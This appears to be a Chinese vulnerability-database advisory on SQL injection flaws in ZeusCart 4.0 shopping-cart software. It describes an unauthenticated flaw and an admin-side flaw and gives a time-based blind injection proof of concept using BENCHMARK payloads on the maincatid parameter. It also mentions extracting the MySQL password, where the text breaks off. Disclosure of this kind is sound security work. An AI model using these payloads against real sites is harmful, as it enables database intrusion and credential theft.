ZeusCart v4.0...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<p>ZeusCart 4.0: SQL Injection</p><p>1.漏洞描述</p><p>在ZeusCart4.0中存在两个注入漏洞,一个注入不需要任何条件即可exploit,另一个是是发生在admin后台的注入。</p><p>因为大部分参数都是依赖于简单的过滤,所以很容易由于过滤不全而产生漏洞。</p><p>2a. Timing based Blind SQL Injection 基于时间的盲注</p><p>证明:</p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1</a></p><p>AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)</p><p>-&gt; true</p><p>&nbsp;</p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1</a></p><p>AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)</p><p>-&gt; false</p><p>payload中不可以使用引号,引号已经被过滤掉。</p><p>通过盲注get mysql密码</p><p><a...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息